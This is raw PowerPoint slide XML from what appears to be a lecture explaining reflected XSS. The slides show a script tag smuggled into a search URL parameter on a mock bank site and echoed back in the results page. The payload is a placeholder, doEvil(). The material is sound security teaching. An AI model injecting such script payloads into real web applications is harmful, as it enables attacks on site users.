              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>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5" name="object 5"/>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6" name="object 6"/>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8" name="object 8"/>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9" name="object 9"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3022601" y="3877901"/>
            <a:ext cx="7365153" cy="1542627"/>
            <a:chOff x="2266950" y="2908426"/>
            <a:chExt cx="5523865" cy="1156970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6911421" y="2908426"/>
              <a:ext cx="879266" cy="1156931"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2286000" y="3484879"/>
              <a:ext cx="4610735" cy="24130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610734" h="24129">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610481" y="23914"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781832" y="3441515"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114934" h="133350">
                  <a:moveTo>
                    <a:pt x="698" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114642" y="67271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133350"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1932066" y="1440405"/>
            <a:ext cx="1998980" cy="2860887"/>
            <a:chOff x="1449049" y="1080303"/>
            <a:chExt cx="1499235" cy="2145665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>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6" name="object 16"/>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7" name="object 17"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2211882" y="1080303"/>
              <a:ext cx="736066" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2289212"/>
            <a:ext cx="4843780" cy="1014807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923" marR="1871933"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safebank.com/search.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542644" y="407731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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367131" y="4396783"/>
            <a:ext cx="2479885" cy="1191259"/>
            <a:chOff x="275348" y="3297587"/>
            <a:chExt cx="1859914" cy="893444"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3342475"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="object 23"/>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4" name="object 24"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3459480"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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26" name="object 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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27" name="object 27"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1053081" y="3707878"/>
              <a:ext cx="964691" cy="169163"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="2202247"/>
            <a:ext cx="1351280" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778241" y="2446087"/>
            <a:ext cx="3192780" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2394584" h="172719">
                <a:moveTo>
                  <a:pt x="2394204" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1287780" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736092" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736092" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287780" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2394204" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2394204" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778241" y="2394609"/>
            <a:ext cx="3192780" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>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33" name="object 33"/>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34" name="object 34"/>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31" name="object 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="2693991"/>
            <a:ext cx="2211493" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>returned </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> results</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs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783" y="333396"/>
            <a:ext cx="4111413"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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-120" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748479" y="5417955"/>
            <a:ext cx="2237740" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>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4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8579315" y="3046306"/>
            <a:ext cx="3261360" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="496134" marR="6773" indent="-480048">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server inserts malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2937417" y="5155983"/>
            <a:ext cx="6217920" cy="228600"/>
            <a:chOff x="2203063" y="3866987"/>
            <a:chExt cx="4663440" cy="171450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2222122" y="3952351"/>
              <a:ext cx="4625340" cy="14604"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4625340" h="14604">
                  <a:moveTo>
                    <a:pt x="4625136" y="14160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38099">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2222113" y="3886037"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114935" h="133350">
                  <a:moveTo>
                    <a:pt x="114096" y="133349"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="66319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114515" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3709245" y="5295596"/>
            <a:ext cx="4237567" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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10" name="object 10"/>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11" name="object 11"/>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12" name="object 12"/>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3" name="object 13"/>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4" name="object 14"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1932066" y="1440405"/>
            <a:ext cx="1998980" cy="2860887"/>
            <a:chOff x="1449049" y="1080303"/>
            <a:chExt cx="1499235" cy="2145665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>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7" name="object 17"/>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8" name="object 18"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2211882" y="1080303"/>
              <a:ext cx="736066" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3022601" y="3877901"/>
            <a:ext cx="7365153" cy="1542627"/>
            <a:chOff x="2266950" y="2908426"/>
            <a:chExt cx="5523865" cy="1156970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6911421" y="2908426"/>
              <a:ext cx="879266" cy="1156931"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2286000" y="3484879"/>
              <a:ext cx="4610735" cy="24130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610734" h="24129">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610481" y="23914"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781832" y="3441515"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114934" h="133350">
                  <a:moveTo>
                    <a:pt x="698" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114642" y="67271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133350"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
